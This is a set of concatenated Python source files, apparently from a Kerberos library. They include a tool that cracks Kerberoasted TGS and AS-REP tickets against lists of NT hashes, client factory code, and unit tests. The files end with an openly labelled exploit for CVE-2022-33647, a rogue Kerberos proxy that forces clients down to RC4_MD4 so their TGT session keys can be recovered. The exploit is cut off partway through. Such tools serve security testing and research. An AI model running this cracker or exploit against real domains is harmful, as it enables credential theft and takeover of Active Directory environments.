from unicrypto.symmetric import RC4 as ARC4
from unicrypto import hmac as HMAC
from unicrypto.hashlib import md5 as MD5
from tqdm import tqdm

def crack_asrep(hashlist, tickets, total = 0):
	for asrep in tickets:
		result = None
		test = asrep.split('$')
		etype = test[2]
		user,checksum  = test[3].split(':')
		edata = test[4]

		#print('Etype : %s' % etype)
		#print('User  : %s' % user)
		#print('Chksum: %s' % checksum)
		#print('EData : %s...' % edata[:16])

		checksum = bytes.fromhex(checksum)
		edata = bytes.fromhex(edata)

		keyusage = 8
		keyusage = keyusage.to_bytes(4, byteorder='little', signed=False)

		for pwhash in tqdm(hashlist, total=total):
			pwhash = pwhash.strip()
			pwhash = bytes.fromhex(pwhash)

			ki = HMAC.new(pwhash, keyusage, MD5).digest()
			ke = HMAC.new(ki, checksum, MD5).digest()
			# at this point you can add some optimizations to make it faster,
			# but honestly I don't think it's needed, it's Python so it will be slow anyhow
			basic_plaintext = ARC4(ke).decrypt(edata)
			exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest()
			if checksum == exp_cksum:
				result = pwhash
				break
		else:
			continue
		print('%s: %s' % (asrep, result.hex()))



def crack_tgs(hashlist, tickets, total = 0):
	for tgs in tickets:
		result = None
		test = tgs.split('$')
		etype = test[2]
		user = test[3]
		realm = test[4]
		checksum = test[6]
		edata = test[7]

		#print('Etype : %s' % etype)
		#print('User  : %s' % user)
		#print('Realm : %s' % realm)
		#print('Chksum: %s' % checksum)
		#print('EData : %s...' % edata[:16])

		checksum = bytes.fromhex(checksum)
		edata = bytes.fromhex(edata)

		keyusage = 2
		keyusage = keyusage.to_bytes(4, byteorder='little', signed=False)

		for pwhash in tqdm(hashlist, total=total):
			pwhash = pwhash.strip()
			pwhash = bytes.fromhex(pwhash)

			ki = HMAC.new(pwhash, keyusage, MD5).digest()
			ke = HMAC.new(ki, checksum, MD5).digest()
			# at this point you can add some optimizations to make it faster,
			# but honestly I don't think it's needed
			basic_plaintext = ARC4(ke).decrypt(edata)
			exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest()
			if checksum == exp_cksum:
				result = pwhash
				break
		else:
			continue
		print('%s: %s' % (tgs, result.hex()))

def crack(hashlist, tickets):
	spntickets = []
	asreptickets = []
	if tickets.lower().find('$krb5tgs$23$') == -1 and tickets.lower().find('$krb5asrep$23$') == -1:
		with open(tickets, 'r') as f:
			for line in f:
				line = line.strip()
				if line == '':
					continue
				
				if line.lower().find('$krb5tgs$23$') != -1:
					spntickets.append(line)
				if line.lower().find('$krb5asrep$23$') != -1:
					asreptickets.append(line)
	else:
		if tickets.lower().find('$krb5tgs$23$') != -1:
			spntickets.append(tickets)
		if tickets.lower().find('$krb5asrep$23$') != -1:
			asreptickets.append(tickets)
	
	tt = len(spntickets) + len(asreptickets)
	if tt == 0:
		print('No tickets loaded! Exiting!')
		return
	
	print('Loaded %s tickets' % tt)
	total = 0
	with open(hashlist, 'r') as f:
		for line in f:
			line = line.strip()
			if line == '':
				continue
			total += 1
	
	with open(hashlist, 'r') as f:
		if len(spntickets) > 0:
			crack_tgs(f, spntickets, total=total)
		if len(asreptickets) > 0:
			crack_asrep(f, asreptickets, total=total)


def main():
	import argparse
	
	parser = argparse.ArgumentParser(description='Tries to decrypt RC4 TGS or ASREP ($krb5tgs$23$ / $krb5asrep$23$) using a list of NT hashes')
	parser.add_argument('hashlist', help='File containing NT hashes')
	parser.add_argument('tickets', help='Kerberoasted ticket in hashcat format. $krb5tgs$23$... or $krb5asrep$23$...')
	 
	args = parser.parse_args()
	
	crack(args.hashlist, args.tickets)


if __name__ == '__main__':
	main()



import getpass
import copy

from minikerberos.common.target import KerberosTarget
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.constants import KerberosSecretType
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.client import KerbrosClient

from urllib.parse import urlparse, parse_qs

from asysocks.unicomm.common.target import UniProto
from asysocks.unicomm.common.proxy import UniProxyTarget
from minikerberos.protocol.constants import EncryptionType

kerberos_url_help_epilog = """==== Extra Help ====
   kerberos connection url secret types: 
   - Plaintext: "pw" or "pass" or "password"
   - NT hash: "nt"
   - RC4 key: "rc4"
   - AES128/256 key: "aes"
   - CCACHE file: "ccache"
   - SSPI: "sspi"
   
   Example:
   - Plaintext + SOCKS5 proxy:
      kerberos+password://domain\\user:SecretPassword@127.0.0.1/proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080
   - Plaintext:
      kerberos+password://domain\\user:SecretPassword@127.0.0.1
      kerberos+pw://domain\\user:SecretPassword@127.0.0.1
      kerberos+pass://domain\\user:SecretPassword@127.0.0.1
   - NT hash:
      kerberos+nt://domain\\user:921a7fece11f4d8c72432e41e40d0372@127.0.0.1
   - SSPI:
      TEST/user/sspi:@192.168.1.1
   - RC4 key:
      kerberos+rc4://domain\\user:921a7fece11f4d8c72432e41e40d0372@127.0.0.1
   - AES key:
      kerberos+aes://domain\\user:921a7fece11f4d8c72432e41e40d0372@127.0.0.1
   - CCACHE file:
      kerberos+ccache://domain\\user:creds.ccache@127.0.0.1
   - KEYTAB file:
      kerberos+keytab://domain\\user:creds.keytab@127.0.0.1
   - PFX file:
      kerberos+pfx://TEST.corp\\Administrator:admin@10.10.10.2/?certdata=test.pfx
   - PFX string (b64):
      kerberos+pfxstr://TEST.corp\\Administrator:admin@10.10.10.2/?certdata=BASE64DATA
   - No auth (preauth not req):
      kerberos+none://TEST.corp\\asrepuser@10.10.10.2/
"""


KerberosClientFactory_param2var = {
	'timeout': ('timeout', [int]),
	'certdata': ('certdata', [str]),
	'keydata': ('keydata', [str]),
	'etype': ('etype', [int]),
	'certstore': ('certstore', [str]),
	'cn': ('commonname', [str]),
}

class KerberosClientFactory:
	def __init__(self, target:KerberosTarget = None, credential = None, proxies = [], certdata = None, keydata = None):
		self.domain = None
		self.username = None
		self.secret_type = None
		self.secret = None
		self.etype = None
		self.certstore = 'MY'
		self.commonname = None

		self.dc_ip = None
		self.protocol = UniProto.CLIENT_TCP
		self.timeout = 10
		self.port = 88

		self.target = target #proxy needs to be already in the target!
		self.credential = credential
		self.proxies = proxies
		self.certdata = certdata
		self.keydata = keydata

	def get_target(self):
		if self.target is not None:
			if self.target.proxies is None and self.proxies is not None:
				self.target.proxies = self.proxies
			return copy.deepcopy(self.target)
		res = KerberosTarget(
			self.dc_ip, 
			port=self.port, 
			protocol = UniProto.CLIENT_TCP, 
			proxies = self.proxies,
			timeout = self.timeout
		)
		return res

	def get_creds(self):
		if self.credential is not None:
			return copy.deepcopy(self.credential)

		if self.secret_type == KerberosSecretType.KEYTAB:
			return KerberosCredential.from_keytab(self.secret, self.username, self.domain)
		if self.secret_type == KerberosSecretType.KIRBI:
			return KerberosCredential.from_kirbi(self.secret)
		if self.secret_type == KerberosSecretType.PFXSTR:
			return KerberosCredential.from_pfx_string(self.certdata, self.secret)
		if self.secret_type == KerberosSecretType.PFX:
			return KerberosCredential.from_pfx_file(self.certdata, self.secret, username=self.username, domain=self.domain)
		if self.secret_type == KerberosSecretType.CCACHE:
			return KerberosCredential.from_ccache(self.secret, principal=self.username, realm=self.domain)
		if self.secret_type == KerberosSecretType.PEM:
			return KerberosCredential.from_pem_file(self.certdata, self.keydata)
		if self.secret_type == KerberosSecretType.CERTSTORE:
			return KerberosCredential.from_windows_certstore(self.commonname, certstore_name = self.certstore, dhparams = None, username = self.username, domain = self.domain)

		res = KerberosCredential()
		res.username = self.username
		res.domain = self.domain

		if self.secret_type in [KerberosSecretType.PASSWORD, KerberosSecretType.PW, KerberosSecretType.PASS]:
			res.password = self.secret
		elif self.secret_type in [KerberosSecretType.NT, KerberosSecretType.RC4]:
			if len(self.secret) != 32:
				raise Exception('Incorrect RC4/NT key! %s' % self.secret)
			res.nt_hash = self.secret
			res.kerberos_key_rc4 = self.secret
		elif self.secret_type in [KerberosSecretType.AES128, KerberosSecretType.AES256, KerberosSecretType.AES]:
			if self.secret_type == KerberosSecretType.AES:
				if len(self.secret) == 32:
					res.kerberos_key_aes_128 = self.secret
				elif len(self.secret) == 64:
					res.kerberos_key_aes_256 = self.secret
				else:
					raise Exception('Incorrect AES key! %s' % self.secret)
			elif self.secret_type == KerberosSecretType.AES128:
				if len(self.secret) != 32:
					raise Exception('Incorrect AES128 key! %s' % self.secret)
				res.kerberos_key_aes_128 = self.secret
			else:
				if len(self.secret) != 64:
					raise Exception('Incorrect AES256 key! %s' % self.secret)
				res.kerberos_key_aes_256 = self.secret
		elif self.secret_type == KerberosSecretType.DES:
			if len(self.secret) != 16:
				raise Exception('Incorrect DES key! %s' % self.secret)
			res.kerberos_key_des = self.secret
		elif self.secret_type in [KerberosSecretType.DES3, KerberosSecretType.TDES]:
			if len(self.secret) != 24:
				raise Exception('Incorrect DES3 key! %s' % self.secret)
			res.kerberos_key_des3 = self.secret
		elif self.secret_type == KerberosSecretType.NONE:
			res.nopreauth = True
		else:
			raise Exception('Missing/unknown secret_type!')

		if self.etype is not None:
			res.override_etypes = [EncryptionType(self.etype)]

		return res
	
	def get_client(self):
		return AIOKerberosClient(self.get_creds(), self.get_target())
	
	def get_client_blocking(self):
		return KerbrosClient(self.get_creds(), self.get_target())
	
	def get_client_newcred(self, cred:KerberosCredential):
		return AIOKerberosClient(copy.deepcopy(cred), self.get_target())
	
	def get_client_newcred_blocking(self, cred:KerberosCredential):
		return KerbrosClient(copy.deepcopy(cred), self.get_target())

	@staticmethod
	def from_url(url_str):
		res = KerberosClientFactory()
		url = urlparse(url_str)

		res.dc_ip = url.hostname
		schemes = url.scheme.upper().split('+')
		
		if schemes[0] not in ['KERBEROS', 'KERBEROS-TCP, KERBEROS-UDP', 'KRB5', 'KRB5-UDP', 'KRB5-TCP']:
			raise Exception('Unknown protocol! %s' % schemes[0])

		if schemes[0].endswith('UDP') is True:
			res.protocol = UniProto.CLIENT_UDP
		
		ttype = schemes[1]
		if ttype.find('-') != -1 and ttype.upper().endswith('-PROMPT'):
			ttype = ttype.split('-')[0]
			res.secret = getpass.getpass()
		try:
			res.secret_type = KerberosSecretType(ttype)
		except:
			raise Exception('Unknown secret type! %s' % ttype)
		
		if url.username is not None:
			if url.username.find('\\') != -1:
				res.domain , res.username = url.username.split('\\')
			else:
				raise Exception('Domain missing from username!')
		else:
			if res.secret_type != KerberosSecretType.CERTSTORE:
				raise Exception('Missing username!')
		
		if res.secret is None:
			res.secret = url.password
		if url.port is not None:
			res.port = int(url.port)
		
		query = parse_qs(url.query)
		proxy_type = None
		for k in query:
			if k == 'proxytype':
				proxy_type = query[k][0]

			
			if k in KerberosClientFactory_param2var:
				data = query[k][0]
				for c in KerberosClientFactory_param2var[k][1]:
					data = c(data)

					setattr(
						res, 
						KerberosClientFactory_param2var[k][0], 
						data
					)
		
		if proxy_type is not None:
			res.proxies = UniProxyTarget.from_url_params(url_str, res.port)
		
		if res.username is None:
			if res.secret_type != KerberosSecretType.CERTSTORE:
				raise Exception('Missing username!')
		
		if res.secret_type == KerberosSecretType.PWPROMPT:
			res.secret_type = KerberosSecretType.PASSWORD
			res.secret = getpass.getpass()

		if res.secret_type is None:
			raise Exception('Missing secret_type!')
		if res.dc_ip is None:
			raise Exception('Missing target hostname or IP!')
		
		if res.secret is None and res.secret_type != KerberosSecretType.NONE:
			if res.secret_type not in [KerberosSecretType.PEM, KerberosSecretType.CERTSTORE]:
				raise Exception('Missing secret/password!')
		
		return res




from minikerberos.protocol.external.ndr import NDRSTRUCT
from minikerberos.protocol.external.dtypes import UCHAR,USHORT, ULONG

# 2.2.6 Type Serialization Version 1
class CommonHeader(NDRSTRUCT):
    structure = (
        ('Version', UCHAR),
        ('Endianness', UCHAR),
        ('CommonHeaderLength', USHORT),
        ('Filler', ULONG),
    )
    def __init__(self, data = None,isNDR64 = False):
        NDRSTRUCT.__init__(self, data, isNDR64)
        if data is None:
            self['Version'] = 1
            self['Endianness'] = 0x10
            self['CommonHeaderLength'] = 8
            self['Filler'] = 0xcccccccc

class PrivateHeader(NDRSTRUCT):
    structure = (
        ('ObjectBufferLength', ULONG),
        ('Filler', ULONG),
    )
    def __init__(self, data = None,isNDR64 = False):
        NDRSTRUCT.__init__(self, data, isNDR64)
        if data is None:
            self['Filler'] = 0xcccccccc

class TypeSerialization1(NDRSTRUCT):
    commonHdr = (
        ('CommonHeader', CommonHeader),
        ('PrivateHeader', PrivateHeader),
    )
    def getData(self, soFar = 0):
        self['PrivateHeader']['ObjectBufferLength'] = len(NDRSTRUCT.getData(self, soFar)) + len(
            NDRSTRUCT.getDataReferents(self, soFar)) - len(self['CommonHeader']) - len(self['PrivateHeader'])
        return NDRSTRUCT.getData(self, soFar)


import shutil
import os
import pathlib
import pytest
import base64
from minikerberos.common.factory import KerberosClientFactory
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.constants import KerberosSecretType
from minikerberos.common.ccache import CCACHE
from minikerberos.protocol.constants import EncryptionType 
from minikerberos.common.keytab import Keytab
from minikerberos.protocol.encryption import Enctype 
from .config import *

def test_url_nt_1():
	urlstr = 'kerberos+nt://domain\\user:921a7fece11f4d8c72432e41e40d0372@127.0.0.1'
	url = KerberosClientFactory.from_url(urlstr)
	cred = url.get_creds()
	assert cred.domain == 'domain'
	assert cred.username == 'user'
	assert cred.nt_hash == '921a7fece11f4d8c72432e41e40d0372'
	assert cred.kerberos_key_rc4 == '921a7fece11f4d8c72432e41e40d0372'

	target = url.get_target()
	assert target.ip == '127.0.0.1'
	assert target.port == 88

def test_addsecret_password():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.PASSWORD, 'password')
	assert cred.password == 'password'

def test_addsecret_rc4():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.RC4, '921a7fece11f4d8c72432e41e40d0372')
	assert cred.nt_hash == '921a7fece11f4d8c72432e41e40d0372'
	assert cred.kerberos_key_rc4 == '921a7fece11f4d8c72432e41e40d0372'

def test_addsecret_aes128():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.AES128, '921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_aes_128 == '921a7fece11f4d8c72432e41e40d0372'
	ret = cred.get_key_for_enctype(EncryptionType.AES128_CTS_HMAC_SHA1_96)
	assert ret == bytes.fromhex('921a7fece11f4d8c72432e41e40d0372')

def test_addsecret_aes128_wrongtype():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.AES128, '921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_aes_128 == '921a7fece11f4d8c72432e41e40d0372'
	with pytest.raises(Exception):
		ret = cred.get_key_for_enctype(EncryptionType.AES256_CTS_HMAC_SHA1_96)

def test_addsecret_aes256():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.AES256, '921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_aes_256 == '921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372'
	ret = cred.get_key_for_enctype(EncryptionType.AES256_CTS_HMAC_SHA1_96)
	assert ret == bytes.fromhex('921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372')

def test_addsecret_aes256_wrongtype():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.AES256, '921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_aes_256 == '921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372'
	ret = cred.get_key_for_enctype(EncryptionType.AES256_CTS_HMAC_SHA1_96)
	assert ret == bytes.fromhex('921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372')
	with pytest.raises(Exception):
		ret = cred.get_key_for_enctype(EncryptionType.AES128_CTS_HMAC_SHA1_96)

def test_addsecret_aes_1():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.AES, '921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_aes_128 == '921a7fece11f4d8c72432e41e40d0372'

def test_addsecret_aes_2():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.AES, '921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_aes_256 == '921a7fece11f4d8c72432e41e40d0372921a7fece11f4d8c72432e41e40d0372'

def test_addsecret_aes_wrong():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'	
	with pytest.raises(Exception) as e_info:
		cred.add_secret(KerberosSecretType.AES, '921a7fece11f4d8c732e41e40d0372921a7fece11f4d8c72432e41e40d0372')


def test_addsecret_des():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.DES, '921a7fece11f4d8c')
	assert cred.kerberos_key_des == '921a7fece11f4d8c'
	ret = cred.get_key_for_enctype(EncryptionType.DES_CBC_MD5)
	assert ret == bytes.fromhex('921a7fece11f4d8c')

def test_addsecret_des3():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.DES3, '921a7fece11f4d8c72432e41e40d0372')
	assert cred.kerberos_key_des3 == '921a7fece11f4d8c72432e41e40d0372'
	ret = cred.get_key_for_enctype(EncryptionType.DES3_CBC_SHA1)
	assert ret == bytes.fromhex('921a7fece11f4d8c72432e41e40d0372')

def test_stringtokey_des3():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.password = 'password'
	ret = cred.get_key_for_enctype(EncryptionType.DES3_CBC_SHA1)

def test_stringtokey_des():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.password = 'password'
	ret = cred.get_key_for_enctype(EncryptionType.DES_CBC_MD5)

def test_addsecret_ccache():
	cred = KerberosCredential()
	cred.domain = 'domain'
	cred.username = 'user'
	cred.add_secret(KerberosSecretType.CCACHE, CCACHE_DIR.joinpath('administrator.ccache'))
	assert len(cred.ccache.get_all_tgt()) > 0

def test_load_ccache_hex():
	ccachedata = CCACHE_DIR.joinpath('administrator.ccache').read_bytes().hex()
	cred = KerberosCredential.from_ccache(ccachedata, encoding = 'hex')
	assert len(cred.ccache.get_all_tgt()) > 0

def test_load_ccache_base64():
	ccachedata = base64.b64encode(CCACHE_DIR.joinpath('administrator.ccache').read_bytes()).decode()
	cred = KerberosCredential.from_ccache(ccachedata, encoding = 'base64')
	assert len(cred.ccache.get_all_tgt()) > 0

def test_load_ccache_file():
	cred = KerberosCredential.from_ccache(CCACHE_DIR.joinpath('administrator.ccache'), encoding = 'file')
	assert len(cred.ccache.get_all_tgt()) > 0

def test_load_ccache_bytes():
	ccachedata = CCACHE_DIR.joinpath('administrator.ccache').read_bytes()
	cred = KerberosCredential.from_ccache(ccachedata, encoding = 'raw')
	assert len(cred.ccache.get_all_tgt()) > 0

def test_load_ccache_wrong():
	with pytest.raises(Exception) as e_info:
		cred = KerberosCredential.from_ccache('wrongasdfafdsf', encoding = 'raw12123123')
#def test_load_ccache_wrong():
#    with pytest.raises(Exception) as e_info:
#        cred = KerberosCredential.from_ccache('wrongasdfafdsf', encoding = 'raw')

def test_load_keytab():
	for keytabfile in get_testfiles_keytab():
		keytab = Keytab.from_file(keytabfile)
		kenctype = [keytabentry.enctype for keytabentry in keytab.entries][0]
		cred = KerberosCredential.from_keytab(keytabfile, 'administrator', 'domain.local')
		assert cred.username == 'administrator'
		assert cred.domain == 'domain.local'
		if Enctype.AES256 == kenctype:
			enctype = EncryptionType.AES256_CTS_HMAC_SHA1_96
		elif Enctype.AES128 == kenctype:
			enctype = EncryptionType.AES128_CTS_HMAC_SHA1_96
		elif Enctype.DES3 == kenctype:
			enctype = EncryptionType.DES3_CBC_SHA1
		elif Enctype.DES_MD5 == kenctype:
			enctype = EncryptionType.DES_CBC_MD5
		elif Enctype.RC4 == kenctype:
			enctype = EncryptionType.ARCFOUR_HMAC_MD5
		
		assert cred.get_key_for_enctype(enctype) is not None

def test_load_keytab_hex():
	for keytabfile in get_testfiles_keytab():
		keytab = Keytab.from_file(keytabfile)
		kenctype = [keytabentry.enctype for keytabentry in keytab.entries][0]
		keytabdata = keytabfile.read_bytes().hex()
		cred = KerberosCredential.from_keytab(keytabdata, 'administrator', 'domain.local', encoding = 'hex')
		assert cred.username == 'administrator'
		assert cred.domain == 'domain.local'
		if Enctype.AES256 == kenctype:
			enctype = EncryptionType.AES256_CTS_HMAC_SHA1_96
		elif Enctype.AES128 == kenctype:
			enctype = EncryptionType.AES128_CTS_HMAC_SHA1_96
		elif Enctype.DES3 == kenctype:
			enctype = EncryptionType.DES3_CBC_SHA1
		elif Enctype.DES_MD5 == kenctype:
			enctype = EncryptionType.DES_CBC_MD5
		elif Enctype.RC4 == kenctype:
			enctype = EncryptionType.ARCFOUR_HMAC_MD5
		
		assert cred.get_key_for_enctype(enctype) is not None

def test_load_keytab_b64_1():
	for keytabfile in get_testfiles_keytab():
		keytab = Keytab.from_file(keytabfile)
		kenctype = [keytabentry.enctype for keytabentry in keytab.entries][0]
		keytabdata = base64.b64encode(keytabfile.read_bytes()).decode()
		cred = KerberosCredential.from_keytab(keytabdata, 'administrator', 'domain.local', encoding = 'base64')
		assert cred.username == 'administrator'
		assert cred.domain == 'domain.local'
		if Enctype.AES256 == kenctype:
			enctype = EncryptionType.AES256_CTS_HMAC_SHA1_96
		elif Enctype.AES128 == kenctype:
			enctype = EncryptionType.AES128_CTS_HMAC_SHA1_96
		elif Enctype.DES3 == kenctype:
			enctype = EncryptionType.DES3_CBC_SHA1
		elif Enctype.DES_MD5 == kenctype:
			enctype = EncryptionType.DES_CBC_MD5
		elif Enctype.RC4 == kenctype:
			enctype = EncryptionType.ARCFOUR_HMAC_MD5
		
		assert cred.get_key_for_enctype(enctype) is not None

def test_load_keytab_b64_2():
	for keytabfile in get_testfiles_keytab():
		keytab = Keytab.from_file(keytabfile)
		kenctype = [keytabentry.enctype for keytabentry in keytab.entries][0]
		keytabdata = base64.b64encode(keytabfile.read_bytes()).decode()
		cred = KerberosCredential.from_keytab_string(keytabdata, 'administrator', 'domain.local')
		assert cred.username == 'administrator'
		assert cred.domain == 'domain.local'
		if Enctype.AES256 == kenctype:
			enctype = EncryptionType.AES256_CTS_HMAC_SHA1_96
		elif Enctype.AES128 == kenctype:
			enctype = EncryptionType.AES128_CTS_HMAC_SHA1_96
		elif Enctype.DES3 == kenctype:
			enctype = EncryptionType.DES3_CBC_SHA1
		elif Enctype.DES_MD5 == kenctype:
			enctype = EncryptionType.DES_CBC_MD5
		elif Enctype.RC4 == kenctype:
			enctype = EncryptionType.ARCFOUR_HMAC_MD5
		
		assert cred.get_key_for_enctype(enctype) is not None


# Exploit for CVE-2022-33647
# 
# This attack will work if the following conditions are met:
#  - DC is not patched
#  - DC allows RC4_MD4 kerberos cipher to be used. Etype: -128 
#  - You can coerce the target machine to connect to your machine on port 88
#
# Original project-zero issue: https://bugs.chromium.org/p/project-zero/issues/detail?id=2310
# Writeup: https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
# 
# Found by: 
#  James Forshaw (@tiraniddo), Project Zero
#  
# This code by:
#  Tamas Jos (@skelsec)
#

import asyncio
import traceback
import datetime
import base64
from minikerberos.protocol.asn1_structs import KerberosMessage, \
	METHOD_DATA, ETYPE_INFO, ETYPE_INFO2, PA_DATA, KRB_ERROR,\
	PrincipalName, EncryptedData, HostAddress, AS_REQ, EncryptionKey,\
	TicketFlags, KrbCredInfo, EncKrbCredPart, KRB_CRED
from minikerberos.protocol.constants import PaDataType
from minikerberos.common.creds import KerberosCredential
from minikerberos.common.target import KerberosTarget
from minikerberos.common.spn import KerberosSPN
from minikerberos.aioclient import AIOKerberosClient
from minikerberos.protocol.encryption import Key, _enctype_table

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

ts_len_hdr_lookup = {
	26: bytes.fromhex('a1030201'),
	27: bytes.fromhex('a1040202'),
	28: bytes.fromhex('a1050203'),
	29: bytes.fromhex('a1060204'),
}

def format_kirbi(data, n = 100):
	kd = base64.b64encode(data).decode()
	return '    ' + '\r\n    '.join([kd[i:i+n] for i in range(0, len(kd), n)])


def tgt_to_kirbi(tgt, sessionkey, now):
	keyd = {
		'keytype': -128, 
		'keyvalue': sessionkey
	}

	ci = {}
	ci['key'] = EncryptionKey(keyd)
	ci['prealm'] = tgt['crealm']
	ci['pname'] = tgt['cname']
	ci['flags'] = TicketFlags(set(['enc-pa-rep', 'forwardable', 'renewable', 'initial', 'proxiable'])) #guessing...
	ci['authtime'] = now
	ci['starttime'] = now
	ci['endtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
	ci['renew-till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
	ci['srealm'] = tgt['crealm'] # guessing! modify this if not valid....
	ci['sname'] = PrincipalName({'name-type': 1, 'name-string': ['krbtgt', tgt['crealm']]})

	ti = {}
	ti['ticket-info'] = [KrbCredInfo(ci)]

	te = {}
	te['etype']  = 0
	te['cipher'] = EncKrbCredPart(ti).dump()

	t = {}
	t['pvno'] = 5
	t['msg-type'] = 22
	t['enc-part'] = EncryptedData(te)
	t['tickets'] = [tgt['ticket']]

	return KRB_CRED(t)

def calc_known_plaintext(cipher):
	# returns the known values for the initial structure which depends on the length
	# original data starts with 24 bytes of \x00 then the ASN1 struct
	# the first 24 bytes is where the cofounder and mac should be but in this case it's just zeroes
	data_length = len(cipher)
	if data_length <= 127:
		raise Exception('NO')
	first_len = data_length - 4
	second_len = first_len - 4
	if first_len < 127:
		fl = first_len.to_bytes(1, byteorder='big', signed=False)
	elif first_len < 256:
		fl = b'\x81' + first_len.to_bytes(1, byteorder='big', signed=False)
	else:
		fl = b'\x82' + first_len.to_bytes(2, byteorder='big', signed=False)

	if second_len < 127:
		sl = second_len.to_bytes(1, byteorder='big', signed=False)
	elif second_len < 256:
		sl = b'\x81' + second_len.to_bytes(1, byteorder='big', signed=False)
	else:
		sl = b'\x82' + second_len.to_bytes(2, byteorder='big', signed=False)
	return b'\x79' + fl + b'\x30'+ sl +b'\xA0\x1B\x30\x19\xA0\x03\x02\x01\x80\xA1\x12\x04\x10'

def get_padding_data():
	# for the attack to work, we need a TGT with a larger-than-normal AS-REP enc-data
	# we achieve this by adding a lot of hostaddresses in the AS-REQ, 
	# which will be reflected in the AS-REP
	hosts = []
	for x in range(50):
		hd = {
			'addr-type' : 1,
			'address' : b'\x00'*2 + x.to_bytes(2, byteorder='big', signed=False)
		}
		hosts.append(HostAddress(hd))
	return hosts

class KerberosProxy:
	def __init__(self, dc_ip, listen_ip, dc_port = 88, listen_port = 88):
		self.dc_ip = dc_ip
		self.dc_port = dc_port
		self.listen_ip = listen_ip
		self.listen_port = listen_port

	async def read_ticket(self, reader):
		try:
			ticketlenraw = await reader.readexactly(4)
			ticketlen = int.from_bytes(ticketlenraw, byteorder = 'big', signed = False)
			ticketdata = await reader.readexactly(ticketlen)
			ticket = KerberosMessage.load(ticketdata)
			ticketnative= ticket.native
			return ticketdata, ticket, ticketnative, None

		except Exception as e:
			return None, None, None, e
	
	async def send_ticket(self, writer, ticketdata):
		try:
			tlen = len(ticketdata).to_bytes(4, byteorder = 'big', signed = False)
			writer.write(tlen + ticketdata)
			await writer.drain()
			return True, None

		except Exception as e:
			return  None, e
	
	async def handle_client(self, reader, writer):
		dcwriter = None
		try:
			addr = writer.get_extra_info('peername')
			saddr = '%s:%s' % (addr[0], addr[1])
			print('[+] Client connected from %s' % (saddr))

			ticketdata, ticket, ticketnative, err = await self.read_ticket(reader)
			if err is not None:
				raise err
			if ticketnative['msg-type'] != 10:
				print('[-] Not expected ticket arrived from client. Msg type: %s' % ticketnative['msg-type'])
				return
			
			for padata in ticketnative['padata']:
				if padata['padata-type'] == 2: #and padata[]:
					ed = EncryptedData.load(padata['padata-value']).native
					if ed['etype'] == -128:
						enc_timestamp = ed['cipher'][24:]
						break
			#This is AS-REQ
			else:
				# not the expected encryption type, sending error message to client,
				# informing it that we only support etype -128
				print('[+] Downgrading Kerberos encryption to RC4_MD4')
				now = datetime.datetime.now(datetime.timezone.utc)
				realm = ticketnative['req-body']['realm']
				pad1 = PA_DATA({
					'padata-type' : PaDataType.ETYPE_INFO2.value,
					'padata-value': ETYPE_INFO2([{'etype' : -128}]).dump()
				})
				pad2 = PA_DATA({
					'padata-type' : 2,
					'padata-value': b'',
				})
				pad3 = PA_DATA({
					'padata-type' : 15,
					'padata-value': b'',
				})
				pad4 = PA_DATA({
					'padata-type' : 16,
					'padata-value': b'',
				})
				md = [pad1, pad2, pad3, pad4]
				
				err = {
					'pvno' : 5,
					'msg-type': 30,
					#'ctime': None
					#'cusec': None,
					'stime' : now.replace(microsecond=0),
					'susec' : now.microsecond,
					'error-code' : 25,
					#'crealm' : None,
					#'cname' : None,
					'realm' : realm,
					'sname' : PrincipalName({'name-type': 1, 'name-string': ['krbtgt', realm]}),# krbtgt name..,
					#'e-text' : None,
					'e-data': METHOD_DATA(md).dump()

				}
				ticketdata = KRB_ERROR(err).dump()

				_, err = await self.send_ticket(writer, ticketdata)
				if err is not None:
					raise err
				return
			
			print('[+] Connecting to DC at %s:%s' % (self.dc_ip, self.dc_port))
			dcreader, dcwriter = await asyncio.open_connection(self.dc_ip, self.dc_port)
			print('[+] Connected to DC!')
			print('[+] Modifying original AS-REQ...')
